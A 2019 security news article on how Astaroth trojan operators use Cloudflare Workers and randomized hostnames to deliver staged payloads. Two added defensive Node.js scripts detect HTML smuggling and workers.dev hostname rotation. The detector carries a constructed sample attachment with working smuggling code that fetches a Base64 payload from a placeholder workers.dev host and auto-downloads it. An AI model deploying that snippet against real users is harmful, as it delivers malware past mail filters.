4 September 2019

The gang behind Astaroth trojan uses Cloudflare Workers to circumvent security solutions

The hacker group behind the Astaroth trojan has changed its tactics and is now distributing a new variant of the malware through the Cloudflare Workers serverless computing platform in order to avoid detection by security solutions.

Cloudflare Workers provides a lightweight JavaScript execution environment that lets developers augment existing applications or build entirely new ones without configuring or maintaining infrastructure. “Workers has a free plan which anyone or anything can sign up for and get 100,000 total requests per day. You can create an unlimited number of workers per account,” explained Check Point malware researcher Marcel Afrahim, who discovered the new campaign.

Astaroth’s operators leverage Cloudflare Workers as part of a three-stage infection process. It starts with a phishing email carrying an HTML attachment that contains obfuscated JavaScript code and links to a domain sitting behind Cloudflare’s web infrastructure. That domain delivers several types of payloads in JSON format, selected by the target’s location, which lets the threat actors quickly swap the malicious files for different targets and avoid being blocked on the basis of the file types sent to their potential victims’ computers.

“To generate the second stage of the attack, the JSON from the URL is parsed, converted from Base64 to an ArrayBuffer, written to the browser’s blob storage, renamed to match the name of the HTML file, and a link is created and auto-clicked to download it to the user’s browser,” Afrahim found.
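The chain quoted above (JSON parsed, Base64 decoded, staged as a Blob, object URL attached to a link, link auto-clicked) is what mail gateways have to recognise inside an HTML attachment, since no file crosses the network until the script runs in the victim’s browser. The following Node.js script is an added example, not code from the Check Point write-up or from the campaign: it extracts inline scripts from an attachment, undoes two cheap obfuscations, scores each step of the chain and checks whether any embedded URL points at a `workers.dev` host. The sample attachment, the hostname `example-worker.account-name.workers.dev` and the threshold that requires the blob/object-URL/click steps together are all constructed for illustration.

```javascript
'use strict';

// Each indicator is one step of the smuggling chain described in the article:
// parse JSON, base64-decode it, stage it as a Blob, mint an object URL,
// set a download filename, auto-click the link.
const INDICATORS = [
  ['json-parse',    /JSON\.parse\s*\(/],
  ['base64-decode', /\batob\s*\(/],
  ['blob-stage',    /new\s+Blob\s*\(/],
  ['object-url',    /URL\.createObjectURL\s*\(/],
  ['download-attr', /\.download\s*=|setAttribute\s*\(\s*['"]download['"]/],
  ['auto-click',    /\.click\s*\(\s*\)/],
];

// Hosts a legitimate attachment rarely needs to reach (assumption for this example).
const SUSPICIOUS_HOST = /\.workers\.dev$/i;

function extractScripts(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Undo \xNN / \uNNNN escapes and String.fromCharCode(...) sequences so the
// indicators match the script's intent rather than its spelling.
function deobfuscate(js) {
  return js
    .replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/String\.fromCharCode\s*\(([\d\s,]+)\)/g, (_, nums) =>
      JSON.stringify(String.fromCharCode(...nums.split(',').map(n => parseInt(n, 10)))));
}

function extractUrls(js) {
  const urls = new Set();
  const re = /https?:\/\/[^\s'"<>)]+/gi;
  let m;
  while ((m = re.exec(js)) !== null) urls.add(m[0]);
  return [...urls];
}

function scanHtmlAttachment(html) {
  const js = extractScripts(html).map(deobfuscate).join('\n');
  const hits = INDICATORS.filter(([, re]) => re.test(js)).map(([name]) => name);
  const urls = extractUrls(js);
  const suspiciousUrls = urls.filter(u => {
    try { return SUSPICIOUS_HOST.test(new URL(u).hostname); } catch { return false; }
  });
  // JSON.parse and atob alone are common in benign pages; staging bytes in a
  // Blob, minting an object URL and auto-clicking it is the smuggling signature.
  const chain = ['blob-stage', 'object-url', 'auto-click'].every(n => hits.includes(n));
  const verdict = !chain ? 'benign-or-unknown'
    : suspiciousUrls.length ? 'smuggling+suspicious-host' : 'smuggling';
  return { hits, urls, suspiciousUrls, verdict };
}

// Constructed sample attachment reproducing the described chain (hostname is fictitious).
const SAMPLE_ATTACHMENT = `<html><body><script>
var u = "https://example-worker.account-name.workers.dev/?id=" + Math.floor(Math.random() * 900000000);
fetch(u).then(r => r.json()).then(j => {
  var d = JSON.parse(j.data);
  var b = Uint8Array.from(atob(d.file), c => c.charCodeAt(0));
  var blob = new Blob([b], {type: "application/zip"});
  var a = document.createElement("a");
  a.href = URL.createObjectURL(blob);
  a.download = document.title + ".zip";
  document.body.appendChild(a); a.click();
});
</script></body></html>`;

// Constructed benign page: uses JSON and base64 but never stages a download.
const BENIGN_PAGE = `<html><body><script>
var cfg = JSON.parse('{"greeting":"aGk="}'); console.log(atob(cfg.greeting));
</script></body></html>`;

console.log(scanHtmlAttachment(SAMPLE_ATTACHMENT));
console.log(scanHtmlAttachment(BENIGN_PAGE).verdict);
```

The verdict deliberately ignores the JSON and Base64 steps on their own; requiring the Blob, object URL and click together keeps ordinary single-page applications out of the alert queue, while the `workers.dev` check only enriches a hit that already matches the chain.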

The second stage of the infection is a zip file built from the data returned by the URL. The archive’s contents redirect to a URL pointing at a script created with the Cloudflare Workers dashboard script editor. The most interesting part here is that the URL used to download the script can be varied with random values, providing “a large or unlimited number of hostnames that can execute particular code, which traditional anti-bot or blocking tools will fail to catch.”

While Cloudflare Workers cannot host files themselves, a Worker can redirect traffic to a static file hosting server without revealing that server’s identity, the researcher pointed out.

The script file is saved to 'temp\ Lqncxmm:vbvvjjh.js' and executed with the Windows Script Host (Wscript) process. Using a simple random number generator, Astaroth’s operators randomize the URL from which the third-stage payload is downloaded. The payload is fetched through ten randomized, unique Cloudflare Worker links, each of which "would have 900 million variations". On systems running a 32-bit version of Windows the attackers instead use a private Google Storage repository with a static link rather than Cloudflare links.
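Both the “unlimited number of hostnames” remark and the ten randomized Worker links with their 900 million variations point at the same defensive lesson: a blocklist of observed URLs or hostnames cannot keep up, but the part of a `workers.dev` address that the attacker cannot randomize for free is the account subdomain (`<worker>.<account-subdomain>.workers.dev`). The script below is an added example, not part of the Check Point report or of any product: it groups proxy-log requests by that account subdomain, counts how many distinct worker labels and client sources each one produces, measures the randomness of the labels, and emits a wildcard pattern to block. The log format (`timestamp source host path`), the log lines and the account names `acct-example` and `partner-example` are constructed for illustration; the thresholds are assumptions to tune per environment.

```javascript
'use strict';

// <worker>.<account-subdomain>.workers.dev: the worker label is what the
// attacker rotates; the account subdomain is the stable pivot.
const WORKERS_DEV = /^(?<worker>[^.]+)\.(?<account>[^.]+)\.workers\.dev$/i;

// Minimal "timestamp source host path" proxy line (constructed format).
function parseProxyLine(line) {
  const [ts, src, host, url] = line.trim().split(/\s+/);
  if (!ts || !src || !host || !url) return null;
  return { ts, src, host: host.toLowerCase(), url };
}

// Shannon entropy in bits per character: generated labels sit well above
// dictionary-word labels such as "api" or "www".
function entropy(s) {
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) { const p = n / s.length; h -= p * Math.log2(p); }
  return h;
}

// Alert on any account subdomain that has produced at least minHosts distinct
// worker hostnames in the window; report label entropy and sources as context.
function findWorkerChurn(lines, { minHosts = 3 } = {}) {
  const byAccount = new Map();
  for (const line of lines) {
    const rec = parseProxyLine(line);
    if (!rec) continue;
    const m = WORKERS_DEV.exec(rec.host);
    if (!m) continue;
    const { worker, account } = m.groups;
    let acc = byAccount.get(account);
    if (!acc) { acc = { workers: new Set(), sources: new Set(), urls: new Set() }; byAccount.set(account, acc); }
    acc.workers.add(worker); acc.sources.add(rec.src); acc.urls.add(rec.url);
  }
  const alerts = [];
  for (const [account, acc] of byAccount) {
    const workers = [...acc.workers];
    if (workers.length < minHosts) continue;
    const avgEntropy = workers.reduce((s, w) => s + entropy(w), 0) / workers.length;
    alerts.push({
      account,
      distinctWorkers: workers.length,
      distinctUrls: acc.urls.size,
      avgEntropy: Number(avgEntropy.toFixed(2)),
      sources: [...acc.sources],
      blockPattern: `*.${account}.workers.dev`,
    });
  }
  return alerts;
}

// Constructed sample: one account rotating worker labels, one benign single-worker app.
const SAMPLE_LOG = [
  '2019-09-04T10:01:02Z 10.0.0.5 a1b2c3d4e5.acct-example.workers.dev /?id=123456789',
  '2019-09-04T10:01:09Z 10.0.0.5 f6g7h8i9j0.acct-example.workers.dev /?id=987654321',
  '2019-09-04T10:02:15Z 10.0.0.7 k1l2m3n4o5.acct-example.workers.dev /?id=555555555',
  '2019-09-04T10:02:40Z 10.0.0.7 p6q7r8s9t0.acct-example.workers.dev /?id=111111111',
  '2019-09-04T10:03:00Z 10.0.0.9 api.partner-example.workers.dev /v1/status',
  '2019-09-04T10:03:05Z 10.0.0.9 www.example.com /index.html',
];

console.log(JSON.stringify(findWorkerChurn(SAMPLE_LOG), null, 2));
```

The emitted `blockPattern` is the actionable output: a wildcard on the account subdomain survives every hostname rotation the attacker can generate, and the `sources` list gives the hosts that opened the attachment and should be triaged for the second- and third-stage artifacts.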

“The most likely explanation for this is that they wanted to fool the sandboxes and automated analysis tools. Most of the automated sandboxes still rely on 32-bit systems, mainly because they have better anti-sandbox detection techniques. Using this method, the threat actors give away a static IOC to the analyst to keep the operation intact in the real world and the users that are being infected,” said the researcher.

Based on his findings, Afrahim concluded that the actors behind this campaign use Cloudflare Workers and Cloudflare’s network to:

1. Have a resilient, efficient and secure network to spread payloads.

2. Rely on trusted domain names and services to expand coverage.

3. Hide from sandboxes and interrupt automated analysis tools.

4. Generate random payload URLs for each run in an innovative way.

5. Rebuild the operation with ease in case of compromise.

 
